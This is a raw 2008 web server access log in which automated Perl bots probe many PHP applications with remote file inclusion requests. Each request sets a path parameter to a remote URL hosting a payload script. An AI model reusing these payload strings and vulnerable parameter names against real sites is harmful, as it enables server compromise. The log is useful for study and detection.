67.212.173.42 - - [24/Aug/2008:02:43:48 -0500] "GET /logs/access_log.1208044800/modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://www.gemeinsammehr.de/phpdaten/mcp/data/content/log/evanescence/cid.txt??? HTTP/1.1" 404 367 "-""libwww-perl/5.811"
67.212.173.42 - - [24/Aug/2008:02:43:48 -0500] "GET /modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://www.gemeinsammehr.de/phpdaten/mcp/data/content/log/evanescence/cid.txt??? HTTP/1.1" 404 340 "-""libwww-perl/5.811"
67.212.173.42 - - [24/Aug/2008:02:43:48 -0500] "GET /logs/modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://www.gemeinsammehr.de/phpdaten/mcp/data/content/log/evanescence/cid.txt??? HTTP/1.1" 404 345 "-""libwww-perl/5.811"
213.203.202.68 - - [24/Aug/2008:02:43:56 -0500] "GET //modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.gemeinsammehr.de/phpdaten/mcp/data/content/log/evanescence/nid.txt?? HTTP/1.1" 404 319 "-""libwww-perl/5.803"
65.254.58.42 - - [24/Aug/2008:02:44:40 -0500] "GET /logs//s_loadenv.inc.php?DOCUMENT_ROOT=http://www.all-cs.ru/sistem.gif? HTTP/1.1" 404 307 "-""libwww-perl/5.811"
65.254.58.42 - - [24/Aug/2008:02:44:40 -0500] "GET //s_loadenv.inc.php?DOCUMENT_ROOT=http://www.all-cs.ru/sistem.gif? HTTP/1.1" 404 302 "-""libwww-perl/5.811"
66.225.213.56 - - [24/Aug/2008:02:44:55 -0500] "GET /logs/phpSecurePages/secure.php?&cfgProgDir=http://septimamaipu.cl/septima/mambots/idbr.txt?? HTTP/1.1" 404 314 "-""libwww-perl/5.810"
66.225.213.56 - - [24/Aug/2008:02:44:56 -0500] "GET /phpSecurePages/secure.php?&cfgProgDir=http://septimamaipu.cl/septima/mambots/idbr.txt?? HTTP/1.1" 404 309 "-""libwww-perl/5.810"
66.225.213.56 - - [24/Aug/2008:02:45:07 -0500] "GET /logs/phpSecurePages/secure.php?&cfgProgDir=http://septimamaipu.cl/septima/mambots/idbr.txt?? HTTP/1.1" 404 314 "-""libwww-perl/5.810"
66.225.213.56 - - [24/Aug/2008:02:45:07 -0500] "GET /phpSecurePages/secure.php?&cfgProgDir=http://septimamaipu.cl/septima/mambots/idbr.txt?? HTTP/1.1" 404 309 "-""libwww-perl/5.810"
64.72.112.112 - - [24/Aug/2008:02:45:08 -0500] "GET /include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://www.matthias-wittekindt.de/micro_cms_files/images/id.txt??? HTTP/1.1" 404 322 "-""libwww-perl/5.800"
64.72.112.112 - - [24/Aug/2008:02:45:10 -0500] "GET /logs/include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://www.matthias-wittekindt.de/micro_cms_files/images/id.txt??? HTTP/1.1" 404 327 "-""libwww-perl/5.800"
216.246.45.200 - - [24/Aug/2008:02:46:17 -0500] "GET /logs/access_log.1208044800//include/footer.inc.php?_AMLconfig[cfg_serverpath]=http://www.geocities.com/kumpulan_surat_sephani/devil.txt?? HTTP/1.1" 404 334 "-""libwww-perl/5.810"
216.246.45.200 - - [24/Aug/2008:02:46:17 -0500] "GET //include/footer.inc.php?_AMLconfig[cfg_serverpath]=http://www.geocities.com/kumpulan_surat_sephani/devil.txt?? HTTP/1.1" 404 307 "-""libwww-perl/5.810"
216.246.45.200 - - [24/Aug/2008:02:46:17 -0500] "GET /logs//include/footer.inc.php?_AMLconfig[cfg_serverpath]=http://www.geocities.com/kumpulan_surat_sephani/devil.txt?? HTTP/1.1" 404 312 "-""libwww-perl/5.810"
69.10.154.65 - - [24/Aug/2008:02:46:39 -0500] "GET /logs/access_log.1208044800/modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://www.latinoconvention.com/mambots/system/.sys/.../safe.txt?? HTTP/1.1" 404 367 "-""libwww-perl/5.810"
69.10.154.65 - - [24/Aug/2008:02:46:39 -0500] "GET /modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://www.latinoconvention.com/mambots/system/.sys/.../safe.txt?? HTTP/1.1" 404 340 "-""libwww-perl/5.810"
69.10.154.65 - - [24/Aug/2008:02:46:39 -0500] "GET /logs/modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://www.latinoconvention.com/mambots/system/.sys/.../safe.txt?? HTTP/1.1" 404 345 "-""libwww-perl/5.810"
86.58.154.237 - - [24/Aug/2008:02:46:48 -0500] "GET /logs/access_log.1208044800/modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://www.latinoconvention.com/mambots/system/.sys/.../safe.txt?? HTTP/1.1" 404 367 "-""libwww-perl/5.79"
86.58.154.237 - - [24/Aug/2008:02:46:48 -0500] "GET /modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://www.latinoconvention.com/mambots/system/.sys/.../safe.txt?? HTTP/1.1" 404 340 "-""libwww-perl/5.79"
86.58.154.237 - - [24/Aug/2008:02:46:48 -0500] "GET /logs/modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://www.latinoconvention.com/mambots/system/.sys/.../safe.txt?? HTTP/1.1" 404 345 "-""libwww-perl/5.79"
190.81.184.98 - - [24/Aug/2008:02:46:56 -0500] "GET /include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://www.maus-and-more.com/micro_cms_files/images/id.txt??? HTTP/1.1" 404 322 "-""libwww-perl/5.79"
190.81.184.98 - - [24/Aug/2008:02:46:56 -0500] "GET /logs/include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://www.maus-and-more.com/micro_cms_files/images/id.txt??? HTTP/1.1" 404 327 "-""libwww-perl/5.79"
213.248.62.98 - - [24/Aug/2008:02:47:09 -0500] "GET /logs/access_log.1208044800/modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://www.latinoconvention.com/mambots/system/.sys/.../safe.txt?? HTTP/1.1" 404 367 "-""libwww-perl/5.65"
213.248.62.98 - - [24/Aug/2008:02:47:09 -0500] "GET /modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://www.latinoconvention.com/mambots/system/.sys/.../safe.txt?? HTTP/1.1" 404 340 "-""libwww-perl/5.65"
213.248.62.98 - - [24/Aug/2008:02:47:10 -0500] "GET /logs/modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://www.latinoconvention.com/mambots/system/.sys/.../safe.txt?? HTTP/1.1" 404 345 "-""libwww-perl/5.65"
70.88.226.121 - - [24/Aug/2008:02:47:42 -0500] "GET /logs//s_loadenv.inc.php?DOCUMENT_ROOT=http://www.stubinger-musik.at/event/bo.do??? HTTP/1.1" 404 307 "-""libwww-perl/5.79"
70.88.226.121 - - [24/Aug/2008:02:47:42 -0500] "GET //s_loadenv.inc.php?DOCUMENT_ROOT=http://www.stubinger-musik.at/event/bo.do??? HTTP/1.1" 404 302 "-""libwww-perl/5.79"
216.75.56.186 - - [24/Aug/2008:02:50:09 -0500] "GET /logs/access_log.1206230400/components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://suport08.freehostia.com/echo.txt? HTTP/1.1" 404 355 "-""libwww-perl/5.803"
216.246.45.200 - - [24/Aug/2008:02:50:17 -0500] "GET /logs/access_log.1199059200//jordanvalley/WebCalendar//tools/send_reminders.php?includedir=http://www.brzina.net//templates/Za/id.txt?? HTTP/1.1" 404 362 "-""libwww-perl/5.810"
213.33.84.163 - - [24/Aug/2008:02:50:20 -0500] "GET //includes/kb_constants.php?module_root_path=http://www.battle-elite.de/be_inside/images/cicons/readme.txt???? HTTP/1.1" 404 310 "-""libwww-perl/5.805"
213.33.84.163 - - [24/Aug/2008:02:50:20 -0500] "GET /logs//includes/kb_constants.php?module_root_path=http://www.battle-elite.de/be_inside/images/cicons/readme.txt???? HTTP/1.1" 404 315 "-""libwww-perl/5.805"
216.246.45.200 - - [24/Aug/2008:02:50:42 -0500] "GET /logs/access_log.1199059200//jordanvalley/WebCalendar//tools/send_reminders.php?includedir=http://www.brzina.net//templates/Za/id.txt?? HTTP/1.1" 404 362 "-""libwww-perl/5.810"
83.137.192.222 - - [24/Aug/2008:02:50:53 -0500] "GET /logs/access_log.1206230400//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://stiegel.biz//modules//News/admin/language/if.txt? HTTP/1.1" 404 365 "-""libwww-perl/5.79"
83.137.192.222 - - [24/Aug/2008:02:50:54 -0500] "GET //contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://stiegel.biz//modules//News/admin/language/if.txt? HTTP/1.1" 404 338 "-""libwww-perl/5.79"
83.137.192.222 - - [24/Aug/2008:02:50:54 -0500] "GET /logs//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://stiegel.biz//modules//News/admin/language/if.txt? HTTP/1.1" 404 343 "-""libwww-perl/5.79"
212.254.73.19 - - [24/Aug/2008:02:51:50 -0500] "GET /logs/?sourcedir=http://peru.americautos.com/images/roxx.jpg? HTTP/1.1" 200 96470 "-""libwww-perl/5.803"
212.254.73.19 - - [24/Aug/2008:02:51:51 -0500] "GET /?sourcedir=http://peru.americautos.com/images/roxx.jpg? HTTP/1.1" 200 1243 "-""libwww-perl/5.803"
86.58.154.237 - - [24/Aug/2008:02:52:45 -0500] "GET /modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://www.latinoconvention.com/mambots/system/.sys/.../safe.txt?? HTTP/1.1" 404 340 "-""libwww-perl/5.79"
212.254.73.19 - - [24/Aug/2008:02:53:09 -0500] "GET /logs//?path%5Bdocroot%5D=http://peru.americautos.com/images/roxx.jpg? HTTP/1.1" 200 96475 "-""libwww-perl/5.803"
212.254.73.19 - - [24/Aug/2008:02:53:09 -0500] "GET //?path%5Bdocroot%5D=http://peru.americautos.com/images/roxx.jpg? HTTP/1.1" 200 1243 "-""libwww-perl/5.803"
12.206.23.168 - - [24/Aug/2008:02:53:53 -0500] "GET /logs//agendax/addevent.inc.php?agendax_path=http://kriminologi.net/plugins/spamx/id.txt??? HTTP/1.1" 404 314 "-""libwww-perl/5.805"
12.206.23.168 - - [24/Aug/2008:02:53:53 -0500] "GET //agendax/addevent.inc.php?agendax_path=http://kriminologi.net/plugins/spamx/id.txt??? HTTP/1.1" 404 309 "-""libwww-perl/5.805"
213.248.62.98 - - [24/Aug/2008:02:54:12 -0500] "GET /modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://www.latinoconvention.com/mambots/system/.sys/.../safe.txt?? HTTP/1.1" 404 340 "-""libwww-perl/5.65"
81.26.209.159 - - [24/Aug/2008:02:54:23 -0500] "GET /logs/modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://www.gemeinsammehr.de/phpdaten/mcp/data/content/log/evanescence/cid.txt??? HTTP/1.1" 404 345 "-""libwww-perl/5.79"
81.26.209.159 - - [24/Aug/2008:02:54:23 -0500] "GET /modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://www.gemeinsammehr.de/phpdaten/mcp/data/content/log/evanescence/cid.txt??? HTTP/1.1" 404 340 "-""libwww-perl/5.79"
69.10.154.65 - - [24/Aug/2008:02:54:48 -0500] "GET /modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://www.latinoconvention.com/mambots/system/.sys/.../safe.txt?? HTTP/1.1" 404 340 "-""libwww-perl/5.810"
74.200.71.114 - - [24/Aug/2008:02:54:58 -0500] "GET /logs//includes/kb_constants.php?module_root_path=http://www.battle-elite.de/be_inside/images/cicons/readme.txt???? HTTP/1.1" 404 315 "-""libwww-perl/5.813"
74.200.71.114 - - [24/Aug/2008:02:54:58 -0500] "GET //includes/kb_constants.php?module_root_path=http://www.battle-elite.de/be_inside/images/cicons/readme.txt???? HTTP/1.1" 404 310 "-""libwww-perl/5.813"
195.12.48.41 - - [24/Aug/2008:02:55:37 -0500] "GET /logs/convert/mvcw.php?step=1&vwar_root=http://www.battle-elite.de/be_inside/images/cicons/arab.txt? HTTP/1.1" 404 305 "-""libwww-perl/5.812"
195.12.48.41 - - [24/Aug/2008:02:55:38 -0500] "GET /convert/mvcw.php?step=1&vwar_root=http://www.battle-elite.de/be_inside/images/cicons/arab.txt? HTTP/1.1" 404 300 "-""libwww-perl/5.812"
207.210.99.66 - - [24/Aug/2008:02:55:52 -0500] "GET /logs/convert/mvcw.php?step=1&vwar_root=http://www.battle-elite.de/be_inside/images/cicons/id2.txt?? HTTP/1.1" 404 305 "-""libwww-perl/5.811"
207.210.99.66 - - [24/Aug/2008:02:55:52 -0500] "GET /convert/mvcw.php?step=1&vwar_root=http://www.battle-elite.de/be_inside/images/cicons/id2.txt?? HTTP/1.1" 404 300 "-""libwww-perl/5.811"
81.6.204.2 - - [24/Aug/2008:02:57:14 -0500] "GET /logs/convert/mvcw.php?step=1&vwar_root=http://www.battle-elite.de/be_inside/images/cicons/id2.txt?? HTTP/1.1" 404 305 "-""libwww-perl/5.805"
81.6.204.2 - - [24/Aug/2008:02:57:14 -0500] "GET /convert/mvcw.php?step=1&vwar_root=http://www.battle-elite.de/be_inside/images/cicons/id2.txt?? HTTP/1.1" 404 300 "-""libwww-perl/5.805"
217.116.177.82 - - [24/Aug/2008:02:57:29 -0500] "GET //?path%5Bdocroot%5D=http://customsbroker.ru//linki/files/contrD.txt?? HTTP/1.1" 200 1243 "-""libwww-perl/5.803"
217.116.177.82 - - [24/Aug/2008:02:57:31 -0500] "GET /logs//?path%5Bdocroot%5D=http://customsbroker.ru//linki/files/contrD.txt?? HTTP/1.1" 200 96475 "-""libwww-perl/5.803"
217.116.177.82 - - [24/Aug/2008:02:57:33 -0500] "GET /logs/access_log.1208044800//?path%5Bdocroot%5D=http://customsbroker.ru//linki/files/contrD.txt?? HTTP/1.1" 404 312 "-""libwww-perl/5.803"
217.116.177.82 - - [24/Aug/2008:02:57:42 -0500] "GET /logs/access_log.1206230400//?path%5Bdocroot%5D=http://customsbroker.ru//linki/files/contrD.txt?? HTTP/1.1" 404 312 "-""libwww-perl/5.803"
65.39.140.181 - - [24/Aug/2008:02:58:13 -0500] "GET /logs//includes/kb_constants.php?module_root_path=http://www.battle-elite.de/be_inside/images/cicons/readme.txt???? HTTP/1.1" 404 315 "-""libwww-perl/5.79"
65.39.140.181 - - [24/Aug/2008:02:58:13 -0500] "GET //includes/kb_constants.php?module_root_path=http://www.battle-elite.de/be_inside/images/cicons/readme.txt???? HTTP/1.1" 404 310 "-""libwww-perl/5.79"
64.185.237.191 - - [24/Aug/2008:02:58:28 -0500] "GET /public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://www.geocities.com/sak4w/rfi/aa.txt??? HTTP/1.1" 404 328 "-""libwww-perl/5.810"
64.185.237.191 - - [24/Aug/2008:02:58:28 -0500] "GET /logs/public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://www.geocities.com/sak4w/rfi/aa.txt??? HTTP/1.1" 404 333 "-""libwww-perl/5.810"
217.116.177.82 - - [24/Aug/2008:02:58:52 -0500] "GET /logs/access_log.1212278400//?path%5Bdocroot%5D=http://customsbroker.ru//linki/files/contrD.txt?? HTTP/1.1" 404 312 "-""libwww-perl/5.803"
69.10.154.65 - - [24/Aug/2008:02:58:52 -0500] "GET /logs/modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://www.latinoconvention.com/mambots/system/.sys/.../safe.txt?? HTTP/1.1" 404 345 "-""libwww-perl/5.810"
69.10.154.65 - - [24/Aug/2008:02:58:53 -0500] "GET /modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://www.latinoconvention.com/mambots/system/.sys/.../safe.txt?? HTTP/1.1" 404 340 "-""libwww-perl/5.810"
217.116.177.82 - - [24/Aug/2008:02:59:03 -0500] "GET /logs/access_log.1205971200//?path%5Bdocroot%5D=http://customsbroker.ru//linki/files/contrD.txt?? HTTP/1.1" 404 312 "-""libwww-perl/5.803"
217.116.177.82 - - [24/Aug/2008:02:59:03 -0500] "GET /logs/access_log.1215561600//?path%5Bdocroot%5D=http://customsbroker.ru//linki/files/contrD.txt?? HTTP/1.1" 404 312 "-""libwww-perl/5.803"
86.58.154.237 - - [24/Aug/2008:02:59:04 -0500] "GET /logs/modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://www.latinoconvention.com/mambots/system/.sys/.../safe.txt?? HTTP/1.1" 404 345 "-""libwww-perl/5.79"
86.58.154.237 - - [24/Aug/2008:02:59:04 -0500] "GET /modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://www.latinoconvention.com/mambots/system/.sys/.../safe.txt?? HTTP/1.1" 404 340 "-""libwww-perl/5.79"
67.212.173.42 - - [24/Aug/2008:02:59:18 -0500] "GET /logs/modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://www.gemeinsammehr.de/phpdaten/mcp/data/content/log/evanescence/cid.txt??? HTTP/1.1" 404 345 "-""libwww-perl/5.811"
67.212.173.42 - - [24/Aug/2008:02:59:18 -0500] "GET /modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://www.gemeinsammehr.de/phpdaten/mcp/data/content/log/evanescence/cid.txt??? HTTP/1.1" 404 340 "-""libwww-perl/5.811"
202.228.204.130 - - [24/Aug/2008:02:59:24 -0500] "GET /logs/public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://ploplop123.x10hosting.com/rfi/id.txt??? HTTP/1.1" 404 333 "-""libwww-perl/5.805"
202.228.204.130 - - [24/Aug/2008:02:59:24 -0500] "GET /public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://ploplop123.x10hosting.com/rfi/id.txt??? HTTP/1.1" 404 328 "-""libwww-perl/5.805"
195.12.48.41 - - [24/Aug/2008:03:00:53 -0500] "GET /logs/convert/mvcw.php?step=1&vwar_root=http://www.battle-elite.de/be_inside/images/cicons/arab.txt? HTTP/1.1" 404 305 "-""libwww-perl/5.812"
195.12.48.41 - - [24/Aug/2008:03:00:53 -0500] "GET /convert/mvcw.php?step=1&vwar_root=http://www.battle-elite.de/be_inside/images/cicons/arab.txt? HTTP/1.1" 404 300 "-""libwww-perl/5.812"
74.52.99.98 - - [24/Aug/2008:03:01:00 -0500] "GET /logs/access_log.1206230400//modules/4nAlbum/public/displayCategory.php?basepath=http://clubmusic.caucasus.net/V7ID.txt?? HTTP/1.1" 404 354 "-""libwww-perl/5.810"
74.52.99.98 - - [24/Aug/2008:03:01:00 -0500] "GET /logs//modules/4nAlbum/public/displayCategory.php?basepath=http://clubmusic.caucasus.net/V7ID.txt?? HTTP/1.1" 404 332 "-""libwww-perl/5.810"
74.52.99.98 - - [24/Aug/2008:03:01:00 -0500] "GET //modules/4nAlbum/public/displayCategory.php?basepath=http://clubmusic.caucasus.net/V7ID.txt?? HTTP/1.1" 404 327 "-""libwww-perl/5.810"
72.9.233.10 - - [24/Aug/2008:03:01:05 -0500] "GET /logs/public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://borneo.siteburg.com/id2.txt?? HTTP/1.1" 404 333 "-""libwww-perl/5.810"
72.9.233.10 - - [24/Aug/2008:03:01:05 -0500] "GET /public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://borneo.siteburg.com/id2.txt?? HTTP/1.1" 404 328 "-""libwww-perl/5.810"
212.241.219.5 - - [24/Aug/2008:03:01:13 -0500] "GET /logs//?path%5Bdocroot%5D=http://reyserver.awardspace.com/ID.txt?? HTTP/1.1" 200 96475 "-""libwww-perl/5.803"
212.241.219.5 - - [24/Aug/2008:03:01:13 -0500] "GET //?path%5Bdocroot%5D=http://reyserver.awardspace.com/ID.txt?? HTTP/1.1" 200 1243 "-""libwww-perl/5.803"
72.9.233.10 - - [24/Aug/2008:03:01:19 -0500] "GET /logs/public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://borneo.siteburg.com/id2.txt?? HTTP/1.1" 404 333 "-""libwww-perl/5.810"
72.9.233.10 - - [24/Aug/2008:03:01:19 -0500] "GET /public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://borneo.siteburg.com/id2.txt?? HTTP/1.1" 404 328 "-""libwww-perl/5.810"
212.254.73.19 - - [24/Aug/2008:03:02:13 -0500] "GET //?path%5Bdocroot%5D=http://peru.americautos.com/images/roxx.jpg? HTTP/1.1" 200 1243 "-""libwww-perl/5.803"
81.6.204.2 - - [24/Aug/2008:03:02:48 -0500] "GET /logs/convert/mvcw.php?step=1&vwar_root=http://www.battle-elite.de/be_inside/images/cicons/id2.txt?? HTTP/1.1" 404 305 "-""libwww-perl/5.805"
81.6.204.2 - - [24/Aug/2008:03:02:48 -0500] "GET /convert/mvcw.php?step=1&vwar_root=http://www.battle-elite.de/be_inside/images/cicons/id2.txt?? HTTP/1.1" 404 300 "-""libwww-perl/5.805"
74.6.8.121 - - [24/Aug/2008:03:04:31 -0500] "GET /tattoo/set4.htm HTTP/1.0" 200 1762 "-""Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
207.44.152.61 - - [24/Aug/2008:03:04:38 -0500] "GET /components/com_sitemap/sitemap.php?mosConfig_admin_path=http://albgroup.webng.com/Id/Bid.txt?? HTTP/1.1" 404 318 "-""Mozilla/2.0 (compatible; MSIE 3.01; Windows 98)"
207.44.152.61 - - [24/Aug/2008:03:04:39 -0500] "GET /logs/components/com_sitemap/sitemap.php?mosConfig_admin_path=http://albgroup.webng.com/Id/Bid.txt?? HTTP/1.1" 404 323 "-""Mozilla/2.0 (compatible; MSIE 3.01; Windows 98)"
213.248.62.98 - - [24/Aug/2008:03:05:30 -0500] "GET /logs/modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://www.latinoconvention.com/mambots/system/.sys/.../safe.txt?? HTTP/1.1" 404 345 "-""libwww-perl/5.65"
213.248.62.98 - - [24/Aug/2008:03:05:30 -0500] "GET /modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://www.latinoconvention.com/mambots/system/.sys/.../safe.txt?? HTTP/1.1" 404 340 "-""libwww-perl/5.65"
216.246.45.200 - - [24/Aug/2008:03:05:44 -0500] "GET /logs/access_log.1200355200//jordanvalley/WebCalendar//tools/send_reminders.php?includedir=http://www.brzina.net//templates/Za/id.txt?? HTTP/1.1" 404 362 "-""libwww-perl/5.810"
64.185.237.191 - - [24/Aug/2008:03:05:46 -0500] "GET /logs/public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://spiritualcultivation.com/modules/idps.txt?? HTTP/1.1" 404 333 "-""libwww-perl/5.810"
64.185.237.191 - - [24/Aug/2008:03:05:46 -0500] "GET /public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://spiritualcultivation.com/modules/idps.txt?? HTTP/1.1" 404 328 "-""libwww-perl/5.810"
216.246.45.200 - - [24/Aug/2008:03:06:23 -0500] "GET /logs/access_log.1200355200//jordanvalley/WebCalendar//tools/send_reminders.php?includedir=http://www.brzina.net//templates/Za/id.txt?? HTTP/1.1" 404 362 "-""libwww-perl/5.810"
203.98.87.14 - - [24/Aug/2008:03:07:09 -0500] "GET /logs/public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://borneo.siteburg.com/id2.txt?? HTTP/1.1" 404 333 "-""libwww-perl/5.79"
203.98.87.14 - - [24/Aug/2008:03:07:09 -0500] "GET /public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://borneo.siteburg.com/id2.txt?? HTTP/1.1" 404 328 "-""libwww-perl/5.79"
64.72.112.112 - - [24/Aug/2008:03:07:34 -0500] "GET //inc/download_center_lite.inc.php?script_root=http://www.matthias-wittekindt.de/micro_cms_files/images/id.txt??? HTTP/1.1" 404 317 "-""libwww-perl/5.800"
64.72.112.112 - - [24/Aug/2008:03:07:34 -0500] "GET /logs//inc/download_center_lite.inc.php?script_root=http://www.matthias-wittekindt.de/micro_cms_files/images/id.txt??? HTTP/1.1" 404 322 "-""libwww-perl/5.800"
217.116.177.82 - - [24/Aug/2008:03:07:54 -0500] "GET ///vwar/backup/errors.php?error=http://customsbroker.ru//linki/files/contrD.txt?? HTTP/1.1" 404 308 "-""libwww-perl/5.803"
74.202.49.162 - - [24/Aug/2008:03:07:55 -0500] "GET /logs/modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://www.gemeinsammehr.de/phpdaten/mcp/data/content/log/evanescence/nid.txt?? HTTP/1.1" 404 345 "-""libwww-perl/5.805"
74.202.49.162 - - [24/Aug/2008:03:07:55 -0500] "GET /modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://www.gemeinsammehr.de/phpdaten/mcp/data/content/log/evanescence/nid.txt?? HTTP/1.1" 404 340 "-""libwww-perl/5.805"
217.116.177.82 - - [24/Aug/2008:03:07:56 -0500] "GET /logs///vwar/backup/errors.php?error=http://customsbroker.ru//linki/files/contrD.txt?? HTTP/1.1" 404 313 "-""libwww-perl/5.803"
217.116.177.82 - - [24/Aug/2008:03:07:58 -0500] "GET /logs/access_log.1206230400///vwar/backup/errors.php?error=http://customsbroker.ru//linki/files/contrD.txt?? HTTP/1.1" 404 335 "-""libwww-perl/5.803"
217.116.177.82 - - [24/Aug/2008:03:07:59 -0500] "GET /logs/access_log.1208044800///vwar/backup/errors.php?error=http://customsbroker.ru//linki/files/contrD.txt?? HTTP/1.1" 404 335 "-""libwww-perl/5.803"
67.212.173.42 - - [24/Aug/2008:03:08:13 -0500] "GET /logs/access_log.1214179200//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.gemeinsammehr.de/phpdaten/mcp/data/content/log/evanescence/cid.txt??? HTTP/1.1" 404 346 "-""libwww-perl/5.811"
67.212.173.42 - - [24/Aug/2008:03:08:13 -0500] "GET //modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.gemeinsammehr.de/phpdaten/mcp/data/content/log/evanescence/cid.txt??? HTTP/1.1" 404 319 "-""libwww-perl/5.811"
67.212.173.42 - - [24/Aug/2008:03:08:13 -0500] "GET /logs//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.gemeinsammehr.de/phpdaten/mcp/data/content/log/evanescence/cid.txt??? HTTP/1.1" 404 324 "-""libwww-perl/5.811"
207.210.99.66 - - [24/Aug/2008:03:08:21 -0500] "GET /logs/convert/mvcw.php?step=1&vwar_root=http://www.battle-elite.de/be_inside/images/cicons/id2.txt?? HTTP/1.1" 404 305 "-""libwww-perl/5.811"
207.210.99.66 - - [24/Aug/2008:03:08:21 -0500] "GET /convert/mvcw.php?step=1&vwar_root=http://www.battle-elite.de/be_inside/images/cicons/id2.txt?? HTTP/1.1" 404 300 "-""libwww-perl/5.811"
81.26.209.159 - - [24/Aug/2008:03:08:55 -0500] "GET /logs/access_log.1214179200//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.gemeinsammehr.de/phpdaten/mcp/data/content/log/evanescence/cid.txt??? HTTP/1.1" 404 346 "-""libwww-perl/5.79"
81.26.209.159 - - [24/Aug/2008:03:08:55 -0500] "GET //modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.gemeinsammehr.de/phpdaten/mcp/data/content/log/evanescence/cid.txt??? HTTP/1.1" 404 319 "-""libwww-perl/5.79"
81.26.209.159 - - [24/Aug/2008:03:08:56 -0500] "GET /logs//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.gemeinsammehr.de/phpdaten/mcp/data/content/log/evanescence/cid.txt??? HTTP/1.1" 404 324 "-""libwww-perl/5.79"
74.6.8.121 - - [24/Aug/2008:03:10:57 -0500] "GET /logs/access_log.1203206400 HTTP/1.0" 200 348103 "-""Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
217.116.177.82 - - [24/Aug/2008:03:12:28 -0500] "GET /errors.php?error=http://customsbroker.ru//linki/files/contrD.txt?? HTTP/1.1" 404 294 "-""libwww-perl/5.803"
217.116.177.82 - - [24/Aug/2008:03:12:29 -0500] "GET /logs/access_log.1212883200/errors.php?error=http://customsbroker.ru//linki/files/contrD.txt?? HTTP/1.1" 404 321 "-""libwww-perl/5.803"
217.116.177.82 - - [24/Aug/2008:03:12:29 -0500] "GET /logs/access_log.1212192000/errors.php?error=http://customsbroker.ru//linki/files/contrD.txt?? HTTP/1.1" 404 321 "-""libwww-perl/5.803"
217.116.177.82 - - [24/Aug/2008:03:12:29 -0500] "GET /logs/errors.php?error=http://customsbroker.ru//linki/files/contrD.txt?? HTTP/1.1" 404 299 "-""libwww-perl/5.803"
